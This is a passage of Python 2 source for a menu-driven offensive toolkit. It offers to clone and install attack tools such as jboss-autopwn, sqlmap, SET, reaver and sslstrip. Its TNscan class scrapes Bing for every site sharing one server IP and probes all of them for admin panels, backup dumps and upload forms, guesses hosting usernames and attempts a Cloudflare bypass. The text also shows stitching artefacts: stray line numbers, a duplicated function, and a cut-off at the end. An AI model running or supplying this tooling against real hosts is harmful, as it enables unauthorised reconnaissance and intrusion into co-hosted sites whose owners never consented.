  1.  
  2. Select from the menu:
  3.  
  4. 1 : Information Gathering
  5. 2 : Password Attacks
  6. 3 : Wireless Testing
  7. 4 : Exploitation Tools
  8. 5 : Sniffing & Spoofing
  9. 6 : Web Hacking
  10. 7 : Privat Tools
  11. 99 : Exit
  12.  
  13. """)
  14. choice = raw_input("Enter Your Choice:")
  15.  
  16. if choice == "1":
  17. info()
  18. elif choice == "2":
  19. passwd()
  20. elif choice == "3":
  21. wire()
  22. elif choice == "4":
  23. exp()
  24. elif choice == "5":
  25. snif()
  26. elif choice == "6":
  27. webhack()
  28. elif choice == "7":
  29. tnn()
  30. elif choice == "99":
  31. clearScr(),sys.exit();
  32. elif choice == "":
  33. menu()
  34. else:
  35. menu()
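def h2ip():
    """Prompt for a hostname and print the IPv4 address it resolves to.

    Uses socket.gethostbyname(), so only the first A record is shown.
    Fix: an unresolvable name used to raise socket.gaierror and unwind the
    whole menu stack; it is now reported and the function returns normally.
    An empty answer is rejected instead of being resolved.
    """
    host = raw_input("Select A Host : ").strip()
    if not host:
        print("No host given.")
        return
    try:
        ips = socket.gethostbyname(host)
    except socket.error as err:  # gaierror/herror are socket.error subclasses
        print("Could not resolve %s: %s" % (host, err))
        return
    print(ips)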
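def ports():
    """Run `nmap -O -Pn <target>` against a user-supplied target, then exit.

    -O (OS detection) needs raw sockets, i.e. root; -Pn skips host discovery.
    Fix: the target used to be interpolated into a shell string passed to
    os.system(), so shell metacharacters in the prompt answer were executed;
    nmap is now invoked with an argument list and no shell.  The process
    exits afterwards, as before.
    """
    import subprocess
    clearScr()
    target = raw_input('Select a Target IP :').strip()
    if target:
        subprocess.call(["nmap", "-O", "-Pn", target])
    else:
        print("No target given.")
    sys.exit()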
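def ifinurl():
    """Describe Inurlbr and ask whether it is already installed.

    A 'yes' answer runs inurl(); anything else returns to menu().
    Fix: the original chained `if ... in yes` / `if ... in no` / elif / else,
    so a 'yes' answer ran inurl() and then also fell into the else branch
    and re-entered menu(); it is now a single if/else.  Note the prompt never
    offers to install -- insinurl() is not reachable from here.
    """
    print(""" This Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found.""")
    print('do you have Inurlbr installed ? ')
    cinurl = raw_input("Y / N : ")
    if cinurl in yes:
        inurl()
    else:
        menu()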
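def commix():
    """Offer to git-clone commix into ./commix; 'n' returns to the info menu.

    Consistency fix: the sibling wrappers return to menu() on an empty or
    unrecognised answer, whereas this one silently fell off the end and
    unwound its caller; it now behaves like its siblings and clears the
    screen through clearScr() rather than a raw `clear`.  The clone's exit
    status is still not checked.
    """
    print("Automated All-in-One OS Command Injection and Exploitation Tool.")
    print("usage : python commix.py --help")
    choicecmx = raw_input("Continue: y/n :")
    if choicecmx in yes:
        os.system("git clone https://github.com/stasinopoulos/commix.git commix")
    elif choicecmx in no:
        clearScr()
        info()
    else:
        menu()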
  65.  
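def pixiewps():
    """Offer to clone and build pixiewps (make, then sudo make install, in pixiewps/src).

    Fix: the build steps were `os.system("cd pixiewps/src & make")` -- a
    single `&` backgrounds the `cd` and runs make in the *current* directory,
    so nothing was ever built; each step now runs with cwd set to the source
    tree and the build is skipped when the clone fails.  The `if`/`if`/`elif`
    chain became one if/else, so the return to menu() after installing is
    explicit rather than a fall-through.  Any other answer returns to menu().
    """
    import subprocess
    print("""Pixiewps is a tool written in C used to bruteforce offline the WPS pin exploiting the low or non-existing entropy of some Access Points, the so-called "pixie dust attack" discovered by Dominique Bongard in summer 2014. It is meant for educational purposes only
""")
    choicewps = raw_input("Continue ? Y/N : ")
    if choicewps in yes:
        if subprocess.call(["git", "clone", "https://github.com/wiire/pixiewps.git"]) == 0:
            subprocess.call(["make"], cwd="pixiewps/src")
            subprocess.call(["sudo", "make", "install"], cwd="pixiewps/src")
        else:
            print("git clone failed; nothing built.")
        menu()
    else:
        menu()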
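def webhack():
    """Web-hacking sub-menu: run the chosen scanner, then return to menu().

    1 maine (Drupal), 2 ifinurl, 3 wppjmla, 4 gravity, 5 sqlscan,
    6 wpminiscanner; 99, an empty answer or anything else goes straight
    back to menu() (99 is labelled Exit but behaves as Back).
    Fix: the original mixed `if` and `elif`, so options 1-5 reached menu()
    only by falling through every later test into the `else`, while option
    6 (matched by the `if` that heads the elif chain) returned to the caller
    instead.  A dispatch table now decides once and the return to menu() is
    explicit for every option.
    """
    print("1 : Drupal Hacking ")
    print("2 : Inurlbr")
    print("3 : Wordpress & Joomla Scanner")
    print("4 : Gravity Form Scanner")
    print("5 : File Upload Checker")
    print("6 : Wordpress Exploit Scanner")
    print("99 : Exit")
    choiceweb = raw_input("Enter Your Choice : ")
    actions = {
        "1": maine,
        "2": ifinurl,
        "3": wppjmla,
        "4": gravity,
        "5": sqlscan,
        "6": wpminiscanner,
    }
    action = actions.get(choiceweb)
    if action is not None:
        clearScr()
        action()
    menu()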
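def inurl():
    """Run an installed ./inurlbr.php with a user-supplied dork and output file name.

    Fix: the dork and file name were pasted into a shell command string, so
    a quote in the dork broke the command (or ran extra ones); inurlbr is
    now invoked with an argument list and no shell.  After the run the
    original tested `cinurl`, a name that does not exist in this scope
    (NameError on every call); that check is gone and the function returns
    to menu(), which is what both of its reachable branches did.
    """
    import subprocess
    dork = raw_input("select a Dork:")
    output = raw_input("select a file to save :")
    subprocess.call(["./inurlbr.php", "--dork", dork, "-s", output + ".txt", "-q", "1,6", "-t", "1"])
    menu()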
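def insinurl():
    """Clone SCANNER-INURLBR, install its PHP/curl dependencies and run inurl().

    Fix: the move step read `mv /SCANNER-INURLBR/inurbr.php inurlbr.php` --
    an absolute path at the filesystem root and a misspelt file name -- so
    ./inurlbr.php never existed and inurl() could not run; it now moves the
    file out of the clone directory created one step earlier (the chmod
    line already used that path).  apt-get still runs without sudo, so this
    only succeeds as root, and the package names (php5, libcurl3) are those
    of 2017-era distributions.
    """
    import subprocess
    subprocess.call(["git", "clone", "https://github.com/googleinurl/SCANNER-INURLBR.git"])
    subprocess.call(["chmod", "+x", "SCANNER-INURLBR/inurlbr.php"])
    subprocess.call(["apt-get", "install", "curl", "libcurl3", "libcurl3-dev", "php5", "php5-cli", "php5-curl"])
    subprocess.call(["mv", "SCANNER-INURLBR/inurlbr.php", "inurlbr.php"])
    clearScr()
    inurl()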
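def nmap():
    """Offer to download, build and install nmap 7.01 from nmap.org.

    Fix: the configure/make steps used `cd nmap-7.01 & ./configure` -- the
    `&` backgrounds the cd and runs the build in the current directory --
    and `os.system("su root")` merely opened an interactive root shell;
    once the user left it, `make install` still ran unprivileged.  Each
    step now runs with cwd set to the extracted tree and the install uses
    sudo, matching the pixiewps wrapper.  The tarball is still not
    verified against nmap.org's published signature -- check it by hand.
    'n' returns to the info menu; anything else returns to menu().
    """
    import subprocess
    choice7 = raw_input("continue ? Y / N : ")
    if choice7 in yes:
        subprocess.call(["wget", "https://nmap.org/dist/nmap-7.01.tar.bz2"])
        subprocess.call(["tar", "xjf", "nmap-7.01.tar.bz2"])
        subprocess.call(["./configure"], cwd="nmap-7.01")
        subprocess.call(["make"], cwd="nmap-7.01")
        subprocess.call(["sudo", "make", "install"], cwd="nmap-7.01")
    elif choice7 in no:
        info()
    else:
        menu()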
def jboss():
    """Describe jboss-autopwn and offer to git-clone it.

    'yes' clones the repository and exits the program; 'no' clears the
    screen and returns to the exploitation menu; anything else -> menu().
    """
    os.system('clear')
    blurb = (
        "This JBoss script deploys a JSP shell on the target JBoss AS server. Once",
        "deployed, the script uses its upload and command execution capability to",
        "provide an interactive session.",
        "",
        "usage : ./e.sh target_ip tcp_port ",
        "Continue: y/n",
    )
    for line in blurb:
        print(line)
    choice9 = raw_input("yes / no :")
    if choice9 in yes:
        os.system("git clone https://github.com/SpiderLabs/jboss-autopwn.git")
        sys.exit()
    if choice9 in no:
        os.system('clear')
        exp()
        return
    menu()
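def sqlmap():
    """Offer to git-clone sqlmap into ./sqlmap-dev.

    Fix: the clone command ended in ` & `, which backgrounded git so the
    menu returned before the checkout finished and its exit status was
    lost; the clone now runs in the foreground.  'n' -> info menu,
    otherwise -> menu().
    """
    print("usage : python sqlmap.py -h")
    choice8 = raw_input("Continue: y/n :")
    if choice8 in yes:
        os.system("git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev")
    elif choice8 in no:
        clearScr()
        info()
    else:
        menu()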
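def setoolkit():
    """Describe SET and offer to clone it and run its setup.py.

    Fix: the answer handling was `if yes` / `if no` / elif / else, so a
    'yes' answer also fell into the else branch and re-entered menu(); one
    if/elif chain now decides, and the return to menu() after installing is
    explicit.  A stray ')' at the start of the second blurb line is removed.
    setup.py is still run with no arguments, as before.  'n' -> info menu,
    otherwise -> menu().
    """
    print("The Social-Engineer Toolkit is an open-source penetration testing framework")
    print(" designed for social engineering. SET has a number of custom attack vectors that ")
    print(" allow you to make a believable attack quickly. SET is a product of TrustedSec, LLC ")
    print("an information security consulting firm located in Cleveland, Ohio.")
    print("")
    choiceset = raw_input("y / n :")
    if choiceset in yes:
        os.system("git clone https://github.com/trustedsec/social-engineer-toolkit.git")
        os.system("python social-engineer-toolkit/setup.py")
        menu()
    elif choiceset in no:
        clearScr()
        info()
    else:
        menu()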
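def cupp():
    """Offer to git-clone cupp and report whether the clone succeeded.

    Fix: "file downloaded successfully" was printed unconditionally, even
    when git failed (no network, directory already present); the message
    now depends on git's exit status.  'n' -> passwd menu, otherwise ->
    menu().
    """
    print("cupp is a password list generator ")
    print("Usage: python cupp.py -h")
    choicecupp = raw_input("Continue: y/n : ")
    if choicecupp in yes:
        status = os.system("git clone https://github.com/Mebus/cupp.git")
        if status == 0:
            print("file downloaded successfully")
        else:
            print("git clone failed (exit status %d)" % status)
    elif choicecupp in no:
        clearScr()
        passwd()
    else:
        menu()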
def ncrack():
    """Offer to fetch ruby-ncrack (a Ruby binding for Ncrack, not Ncrack itself).

    NOTE(review): the install steps cannot work as written --
    `os.system("cd ruby-ncrack")` changes directory in a child shell that
    exits immediately, and `install ruby-ncrack` invokes coreutils
    install(1) on the clone directory, which is not how a Ruby gem is
    installed.  The correct command is not shown anywhere in this file, so
    the lines are left untouched here.  'n' -> passwd menu, empty or other
    answer -> menu().
    """
    print("A Ruby interface to Ncrack, Network authentication cracking tool.")
    print("requires : nmap >= 0.3ALPHA / rprogram ~> 0.3")
    print("Continue: y/n")
    choicencrack = raw_input("y / n :")
    if choicencrack in yes:
        os.system("git clone https://github.com/sophsec/ruby-ncrack.git")
        os.system("cd ruby-ncrack")  # no effect: runs in a separate shell
        os.system("install ruby-ncrack")  # coreutils install(1); see docstring
    elif choicencrack in no:
        clearScr(); passwd()
    elif choicencrack == "":
        menu()
    else:
        menu()
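def reaver():
    """Offer to install the t6x reaver fork: apt deps, git clone, configure, make.

    Fix: `cd reaver-wps-fork-t6x/src/ & ./configure` backgrounds the cd and
    runs configure in the current directory (same for make), so nothing was
    ever built; both steps now run with cwd set to the src tree.  apt-get
    is still invoked without sudo, as before, so this needs root.  The
    blurb says "1 to accept / 0 to decline" but the answer is matched
    against the y/n word lists, exactly as in the original.  'n' -> wireless
    menu, otherwise -> menu().
    """
    import subprocess
    print("""
Reaver has been designed to be a robust and practical attack against Wi-Fi Protected Setup
WPS registrar PINs in order to recover WPA/WPA2 passphrases. It has been tested against a
wide variety of access points and WPS implementations
1 to accept / 0 to decline
""")
    creaver = raw_input("y / n :")
    if creaver in yes:
        os.system("apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps")
        os.system("git clone https://github.com/t6x/reaver-wps-fork-t6x.git")
        subprocess.call(["./configure"], cwd="reaver-wps-fork-t6x/src/")
        subprocess.call(["make"], cwd="reaver-wps-fork-t6x/src/")
    elif creaver in no:
        clearScr()
        wire()
    else:
        menu()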
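def ssls():
    """Describe sslstrip and offer to clone it, apt-install python-twisted-web and run setup.py.

    Fix: `if yes` / `if no` / elif / else meant a 'yes' answer also fell
    into the else branch and re-entered menu(); it is now one if/elif chain
    that returns to menu() explicitly after installing.  setup.py is still
    run without arguments and the apt step still relies on sudo, as before.
    'n' -> sniffing menu, otherwise -> menu().
    """
    print("""sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping
attacks.
It requires Python 2.5 or newer, along with the 'twisted' python module.""")
    cssl = raw_input("y / n :")
    if cssl in yes:
        os.system("git clone https://github.com/moxie0/sslstrip.git")
        os.system("sudo apt-get install python-twisted-web")
        os.system("python sslstrip/setup.py")
        menu()
    elif cssl in no:
        snif()
    else:
        menu()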
def unique(seq):
    """Return the elements of *seq* as a list, duplicates dropped, first occurrence kept.

    Elements must be hashable.
    """
    seen = set()
    result = []
    for item in seq:
        if item in seen:
            continue
        seen.add(item)
        result.append(item)
    return result
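def bing_all_grabber(s):
    """Collect the sites Bing indexes for the `ip:<s>` dork of one server.

    Pages through Bing (50 results a page, offsets 1, 51, 101) and returns
    the de-duplicated list of 'http://www.host/'-style origins scraped from
    the result anchors, in first-seen order.  Only http:// links are kept
    (the regex does not match https) and a host whose name contains 'www'
    anywhere is left without the prefix -- both unchanged from the original.

    Fix: the page counter was incremented inside the try block, so a single
    URLError left `page` unchanged and the loop ran forever; it now advances
    on every iteration, and each response is closed.  A failed page is
    skipped (best effort), as before.
    """
    lista = []
    page = 1
    while page <= 101:
        bing = "http://www.bing.com/search?q=ip%3A" + s + "+&count=50&first=" + str(page)
        try:
            openbing = urllib2.urlopen(bing)
            try:
                readbing = openbing.read()
            finally:
                openbing.close()
        except urllib2.URLError:
            readbing = ""
        for allnoclean in re.findall('<h2><a href="(.*?)"', readbing):
            for item in re.findall('http://(.*?)/', allnoclean):
                if 'www' not in item:
                    lista.append('http://www.' + item + '/')
                else:
                    lista.append('http://' + item + '/')
        page += 50
    return unique(lista)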
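def check_gravityforms(sites):
    """Return the entries of *sites* (each ending in '/') whose
    wp-content/plugins/gravityforms/gravityforms.php answers HTTP 403.

    A 403 is taken as "plugin file present but not directly served"; 200
    and every other status are ignored.  Fix: the bare `except:` also
    swallowed KeyboardInterrupt, so a long list could not be interrupted;
    only IOError (what urllib.urlopen raises on a transport failure) and
    ValueError (malformed URL) are skipped now, and each response is
    closed.  Returns [] for an empty input without touching the network.
    """
    import urllib
    gravityforms = []
    for site in sites:
        try:
            resp = urllib.urlopen(site + 'wp-content/plugins/gravityforms/gravityforms.php')
        except (IOError, ValueError):
            continue
        try:
            if resp.getcode() == 403:
                gravityforms.append(site)
        finally:
            resp.close()
    return gravityforms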
def gravity():
    """Prompt for a server IP, grab its Bing-listed sites and print those that
    look like they run the Gravity Forms WordPress plugin (403 on its main file)."""
    ip = raw_input('Enter IP : ')
    candidates = bing_all_grabber(str(ip))
    hits = check_gravityforms(candidates)
    for hit in hits:
        print(hit)
    print('\n')
    print('[*] Found,  %d  gravityforms.' % len(hits))
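def shellnoob():
    """Offer to clone ShellNoob, move shellnoob.py to the cwd and run `--install` via sudo.

    Fix: the `if yes` / `if no` / elif / else chain let a 'yes' answer fall
    into the else branch and re-enter menu() after installing; now one
    if/elif chain decides and the return to menu() is explicit.
    'n' -> exploitation menu, otherwise -> menu().
    """
    print("""Writing shellcodes has always been super fun, but some parts are extremely boring and error prone. Focus only on the fun part, and use ShellNoob!""")
    cshell = raw_input("Y / N : ")
    if cshell in yes:
        os.system("git clone https://github.com/reyammer/shellnoob.git")
        os.system("mv shellnoob/shellnoob.py shellnoob.py")
        os.system("sudo python shellnoob.py --install")
        menu()
    elif cshell in no:
        exp()
    else:
        menu()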
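def info():
    """Information-gathering sub-menu.

    1 nmap installer, 2 setoolkit, 3 ports (nmap scan; exits the program),
    4 h2ip.  After the chosen action returns, control goes back to menu(),
    as it does for 99, an empty answer or anything unrecognised.
    Fix: the original `if`/`if`/`if`/`if`/`elif`/`else` chain reached
    menu() only by accident -- a valid choice fell through every later test
    into the `else` -- and option 1 used a raw `clear` instead of
    clearScr(); the dispatch is now a table and the return to menu() is
    explicit.
    """
    print("1: nmap ")
    print("2: Setoolkit")
    print("3: Port Scanning")
    print("4: Host To IP")
    print("99: Back To Main Menu")
    choice2 = raw_input("Select from the menu:")
    actions = {"1": nmap, "2": setoolkit, "3": ports, "4": h2ip}
    action = actions.get(choice2)
    if action is not None:
        clearScr()
        action()
    elif choice2 == "99":
        clearScr()
    menu()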
def priv8():
    """Alias for the 'Privat Tools' entry: start the TNscan prompt via tnn()."""
    tnn()
    return None
def passwd():
    """Password-attacks sub-menu: 1 -> cupp(), 2 -> ncrack(), 99/empty/other -> menu().

    Unlike most other sub-menus this one does not return to menu() after
    the chosen tool finishes; it returns to its caller.  99 clears the
    screen before going back.
    """
    print("1: cupp ")
    print("2: Ncrack")
    print("99: Back To Main Menu")
    choice3 = raw_input("Select from the menu:")
    if choice3 == "1":
        clearScr()
        cupp()
    elif choice3 == "2":
        clearScr()
        ncrack()
    else:
        if choice3 == "99":
            clearScr()
        menu()
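def wire():
    """Wireless sub-menu: 1 -> reaver(), 2 -> pixiewps(); then back to menu().

    99, an empty answer or anything else goes straight to menu().
    Fix: the original `if`/`if`/`elif`/`else` chain sent option 1 back to
    menu() only because it fell through into the `else`, while option 2
    (the `if` heading the elif chain) returned to the caller instead; both
    now return to menu() explicitly.
    """
    print("1 : reaver ")
    print("2 : pixiewps")
    print("99: Back To The Main Menu")
    choice4 = raw_input("Select from the menu:")
    actions = {"1": reaver, "2": pixiewps}
    action = actions.get(choice4)
    if action is not None:
        clearScr()
        action()
    menu()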
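def exp():
    """Exploitation sub-menu: 1 jboss, 2 sqlmap, 3 shellnoob, 4 commix; then menu().

    99, an empty answer or anything else goes straight to menu().
    Fix: the original `if`/`if`/`if`/`if`/`elif`/`else` chain reached
    menu() for options 1-3 only by falling through into the `else`, while
    option 4 (the `if` heading the elif chain) returned to the caller; the
    dispatch is now a table, clearScr() is used for every option instead of
    a raw `clear` for some, and the return to menu() is explicit.
    """
    print("1 : jboss-autopwn ")
    print("2 : sqlmap")
    print("3 : Shellnoob")
    print("4 : commix")
    print("99 : Go Back To Main Menu")
    choice5 = raw_input("Select from the menu:")
    actions = {"1": jboss, "2": sqlmap, "3": shellnoob, "4": commix}
    action = actions.get(choice5)
    if action is not None:
        clearScr()
        action()
    menu()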
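def snif():
    """Sniffing & spoofing sub-menu: 1 -> setoolkit(), 2 -> ssls(); then menu().

    99 clears the screen and returns to menu(); an empty answer or anything
    else returns to menu() as well.
    Fix: the original `if`/`if`/`if`/`elif`/`else` chain reached menu()
    after options 1 and 2 only by falling through into the `else`; the
    dispatch is now a table and the return to menu() is explicit.
    """
    print("1 : Setoolkit ")
    print("2 : Ssltrip")
    print("99: Back To Main Menu")
    choice6 = raw_input("Select from the menu:")
    actions = {"1": setoolkit, "2": ssls}
    action = actions.get(choice6)
    if action is not None:
        clearScr()
        action()
    elif choice6 == "99":
        clearScr()
    menu()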
def win():
    """Windows is not supported: clear the screen, say so and exit the program."""
    clearScr()
    message = "Our Tool Does Not Support Windows , run it on linux or install a virtual machine "
    print(message)
    sys.exit()
403. # Ask which operating system the tool is running on and route accordingly
def OS():
    """Ask which operating system the tool is running on and route accordingly.

    2 (Linux) -> menu(); 1 (Mac OSX) -> root(), which insists on uid 0;
    3 (Windows) -> win(), which exits; an empty answer asks again; anything
    else exits the program.
    """
    print("""
Choose Operating System :
1) Mac OSX
2) Linux
3) Windows
""")
    answer = raw_input("choose an OS : ")
    routes = {"2": menu, "1": root, "3": win, "": OS}
    if answer not in routes:
        sys.exit()
    routes[answer]()
def root():
    """Continue to menu() only when running as uid 0; otherwise print a hint and exit."""
    if os.getuid() == 0:
        menu()
        return
    print("Are you root? Please execute as root")
    exit()
# Menu text for the TNscan class (printed by TNscan.__init__).  Option 99
# calls menu() and then continues the TNscan loop -- it does not exit,
# despite its label.
menuu = """
1) Get all websites
2) Get joomla websites
3) Get wordpress websites
4) Find control panel
5) Find zip files
6) Find upload files
7) Get server users
8) Scan from SQL injection
9) Scan ports (range of ports)
10) Scan ports (common ports)
11) Get server banner
12) Bypass Cloudflare
99) Exit
"""
def unique(seq):
    """Return a list of *seq*'s distinct elements in order of first appearance.

    Elements must be hashable.  (Same order-preserving dedup idiom as the
    other unique() definitions in this file.)
    """
    seen = set()

    def first_time(element):
        if element in seen:
            return False
        seen.add(element)
        return True

    return [element for element in seq if first_time(element)]
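def clearScr():
    """Clear the terminal: `clear` on Linux and macOS, `cls` on Windows.

    Fix: the OS() prompt offers "Mac OSX", but platform.system() reports
    'Darwin' there and the original matched only 'Linux'/'Windows', so the
    screen was never cleared on a Mac.  Any other platform is a no-op.
    platform is imported locally so the function does not depend on a
    file-level `from platform import system`.
    """
    import platform
    name = platform.system()
    if name in ('Linux', 'Darwin'):
        os.system('clear')
    elif name == 'Windows':
        os.system('cls')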
class TNscan :  # per-server recon menu; see the class docstring
    """Interactive recon against every site Bing lists on one server IP.

    Constructing the object (TNscan(ip)) does all the work: it scrapes Bing
    for sites hosted on *serverip* into self.sites, prints `menuu` and then
    loops on the choice / "Continue [Y/n]" prompts until the user answers N
    (exit()).  There is no other way out: option 99 calls menu() and, when
    that returns, the loop continues.

    Scope caveat for testers: every probe below is fired at *all* of
    self.sites, i.e. at every tenant of a shared host, not only at the one
    you are authorised to test.  Filter self.sites before using this.

    Defects visible in this class, left unchanged here:
      * getSites() and getWordpress() bump `page` inside the try, so a
        single network error repeats the same page forever.
      * cloudflareBypasser() discards the results of str.replace(), so the
        names it resolves still carry 'http://'.
      * portScanner() never closes its sockets and has no timeout.
      * several bare `except:` clauses also swallow KeyboardInterrupt.
    """
    def __init__(self, serverip) :
        """Store the IP, populate self.sites silently and run the menu loop."""
        self.serverip = serverip
        self.getSites(False)
        print menuu
        while True :
            choice = raw_input(' Enter choice -> ')
            if choice == '1' :
                self.getSites(True)
            elif choice == '2' :
                self.getJoomla()
            elif choice == '3' :
                self.getWordpress()
            elif choice == '4' :
                self.findPanels()
            elif choice == '5' :
                self.findZip()
            elif choice == '6' :
                self.findUp()
            elif choice == '7' :
                self.getUsers()
            elif choice == '8' :
                self.grabSqli()
            elif choice == '9' :
                ran = raw_input(' Enter range of ports, (ex : 1-1000) -> ')
                self.portScanner(1, ran)
            elif choice == '10' :
                self.portScanner(2, None)
            elif choice == '11' :
                self.getServerBanner()
            elif choice == '12' :
                self.cloudflareBypasser()
            elif choice == '99' :
                menu()  # comes back here when menu() returns
            con = raw_input(' Continue [Y/n] -> ')
            if con[0].upper() == 'N' :  # IndexError on an empty answer
                exit()
            else :
                clearScr()
                print menuu
    def getSites(self, a) :
        """
        Fill self.sites with 'http://www.host/' origins scraped from Bing's
        `ip:<serverip>` results (offsets 1, 51, 101; 50 per page), de-duplicated
        with unique().  Only http:// anchors are matched; hosts whose name
        contains 'www' anywhere keep it, all others get a 'www.' prefix.
        When *a* is true the list is also printed -- the count shown is
        len(lista), the raw pre-dedup total, not len(self.sites).
        NOTE: `page += 50` sits inside the try, so a URLError loops forever.
        """
        lista = []
        page = 1
        while page <= 101:
            try:
                bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+&count=50&first=" + str(page)
                openbing = urllib2.urlopen(bing)
                readbing = openbing.read()
                findwebs = re.findall('<h2><a href="(.*?)"', readbing)
                for i in range(len(findwebs)):
                    allnoclean = findwebs[i]
                    findall1 = re.findall('http://(.*?)/', allnoclean)
                    for idx, item in enumerate(findall1):
                        if 'www' not in item:
                            findall1[idx] = 'http://www.' + item + '/'
                        else:
                            findall1[idx] = 'http://' + item + '/'
                    lista.extend(findall1)

                page += 50
            except urllib2.URLError:
                pass
        self.sites = unique(lista)
        if a :
            clearScr()
            print '[*] Found ', len(lista), ' Website\n'
            for site in self.sites :
                print site
    def getWordpress(self) :
        """
        Print the sites Bing returns for `ip:<serverip> ?page_id=`, i.e. URLs
        that look like WordPress permalinks, trimmed to everything before
        '?page_id=' and de-duplicated.  Does not touch self.sites.
        NOTE: the bare except hides every error (including KeyboardInterrupt)
        and `page += 50` is inside the try, so a failure loops forever.
        """
        lista = []
        page = 1
        while page <= 101:
            try:
                bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+?page_id=&count=50&first=" + str(page)
                openbing = urllib2.urlopen(bing)
                readbing = openbing.read()
                findwebs = re.findall('<h2><a href="(.*?)"', readbing)
                for i in range(len(findwebs)):
                    wpnoclean = findwebs[i]
                    findwp = re.findall('(.*?)\?page_id=', wpnoclean)
                    lista.extend(findwp)
                page += 50
            except:
                pass
        lista = unique(lista)
        clearScr()
        print '[*] Found ', len(lista), ' Wordpress Website\n'
        for site in lista :
            print site
    def getJoomla(self) :
        """
        Print the sites Bing returns for `ip:<serverip> index.php?option=com`
        (Joomla-style URLs), trimmed to everything before 'index.php' and
        de-duplicated.  There is no error handling: a failed Bing request
        propagates out of the menu loop.  Does not touch self.sites.
        """
        lista = []
        page = 1
        while page <= 101:
            bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+index.php?option=com&count=50&first=" + str(page)
            openbing = urllib2.urlopen(bing)
            readbing = openbing.read()
            findwebs = re.findall('<h2><a href="(.*?)"', readbing)
            for i in range(len(findwebs)):
                jmnoclean = findwebs[i]
                findjm = re.findall('(.*?)index.php', jmnoclean)  # '.' is unescaped
                lista.extend(findjm)
            page += 50
        lista = unique(lista)
        clearScr()
        print '[*] Found ', len(lista), ' Joomla Website\n'
        for site in lista :
            print site
    ############################
    #find admin panels
    def findPanels(self) :
        """
        Request each path in adminList on every site in self.sites and print
        the ones that answer HTTP 200.  urllib.urlopen() does not raise on
        HTTP error codes, so only transport failures (IOError) are skipped;
        a site that returns 200 for unknown paths is reported for every entry.
        """
        print "[~] Finding admin panels"
        adminList = ['admin/', 'site/admin', 'admin.php/', 'up/admin/', 'central/admin/', 'whm/admin/', 'whmcs/admin/', 'support/admin/', 'upload/admin/', 'video/admin/', 'shop/admin/', 'shoping/admin/', 'wp-admin/', 'wp/wp-admin/', 'blog/wp-admin/', 'admincp/', 'admincp.php/', 'vb/admincp/', 'forum/admincp/', 'up/admincp/', 'administrator/', 'administrator.php/', 'joomla/administrator/', 'jm/administrator/', 'site/administrator/', 'install/', 'vb/install/', 'dimcp/', 'clientes/', 'admin_cp/', 'login/', 'login.php', 'site/login', 'site/login.php', 'up/login/', 'up/login.php', 'cp.php', 'up/cp', 'cp', 'master', 'adm', 'member', 'control', 'webmaster', 'myadmin', 'admin_cp', 'admin_site']
        clearScr()
        for site in self.sites :
            for admin in adminList :
                try :
                    if urllib.urlopen(site + admin).getcode() == 200 :
                        print "[*] Found admin panel -> ", site + admin
                except IOError :
                    pass
    ############################
    #find ZIP files
    def findZip(self) :
        """
        Request each archive/dump name in zipList on every site in self.sites
        and print the ones answering HTTP 200.  Same 200-only logic and
        soft-404 caveat as findPanels(); only the status is checked, the body
        is never downloaded.
        """
        zipList = ['backup.tar.gz', 'backup/backup.tar.gz', 'backup/backup.zip', 'vb/backup.zip', 'site/backup.zip', 'backup.zip', 'backup.rar', 'backup.sql', 'vb/vb.zip', 'vb.zip', 'vb.sql', 'vb.rar', 'vb1.zip', 'vb2.zip', 'vbb.zip', 'vb3.zip', 'upload.zip', 'up/upload.zip', 'joomla.zip', 'joomla.rar', 'joomla.sql', 'wordpress.zip', 'wp/wordpress.zip', 'blog/wordpress.zip', 'wordpress.rar']
        clearScr()
        print "[~] Finding zip file"
        for site in self.sites :
            for zip1 in zipList :
                try:
                    if urllib.urlopen(site + zip1).getcode() == 200 :
                        print "[*] Found zip file -> ", site + zip1
                except IOError :
                    pass
    ############################
    #find upload directories
    def findUp(self) :
        """
        Request each name in upList on every site in self.sites; when it
        answers 200 the page is fetched a second time and reported if a line
        contains the literal text 'type=file'.  That pattern has no quotes,
        so markup written as type="file" does not match it.
        """
        upList = ['up.php', 'up1.php', 'up/up.php', 'site/up.php', 'vb/up.php', 'forum/up.php','blog/up.php', 'upload.php', 'upload1.php', 'upload2.php', 'vb/upload.php', 'forum/upload.php', 'blog/upload.php', 'site/upload.php', 'download.php']
        clearScr()
        print "[~] Finding Upload"
        for site in self.sites :
            for up in upList :
                try :
                    if (urllib.urlopen(site + up).getcode() == 200) :
                        html = urllib.urlopen(site + up).readlines()  # second fetch of the same URL
                        for line in html :
                            if re.findall('type=file', line) :
                                print "[*] Found upload -> ", site+up
                except IOError :
                    pass
    ############################
    #find users
    def getUsers(self) :
        """
        Guess the hosting account name of each site from its hostname: strip
        the scheme, 'www.', dots, dashes and slashes, then request
        /cgi-sys/guestbook.cgi?user=<candidate>, dropping one trailing
        character per attempt (down to length 3) until the response no longer
        contains 'invalid username'.  The first hit is recorded and the loop
        breaks; each rejected candidate is printed.  The bare except hides
        every error, including KeyboardInterrupt.  Found names are printed
        again at the end after clearing the screen.
        """
        clearScr()
        print "[~] Grabbing Users"
        userslist = []
        for site1 in self.sites :
            try:
                site = site1
                site = site.replace('http://www.', '')
                site = site.replace('http://', '')
                site = site.replace('.', '')
                if '-' in site:
                    site = site.replace('-', '')
                site = site.replace('/', '')
                while len(site) > 2:
                    resp = urllib2.urlopen(site1 + '/cgi-sys/guestbook.cgi?user=%s' % site).read()
                    if 'invalid username' not in resp.lower():
                        print '\t[*] Found -> ', site
                        userslist.append(site)
                        break
                    else :
                        print site

                    site = site[:-1]
            except:
                pass

        clearScr()
        for user in userslist :
            print user
    ############################
    #bypass cloudflare
    def cloudflareBypasser(self) :
        """
        Intended to find an origin address behind Cloudflare by resolving
        mail./webmail./ftp./direct./cpanel. sub-names of each site and
        reporting the first whose address differs from the site's own.
        NOTE: the two str.replace() calls below discard their result (strings
        are immutable), so `site` still reads 'http://www.host/'; resolving
        that, and 'mail.http://www.host/', should fail with socket.error,
        which is swallowed -- in practice only the '[~] Trying' lines print.
        """
        clearScr()
        print "[~] Bypassing cloudflare"
        subdoms = ['mail', 'webmail', 'ftp', 'direct', 'cpanel']
        for site in self.sites :
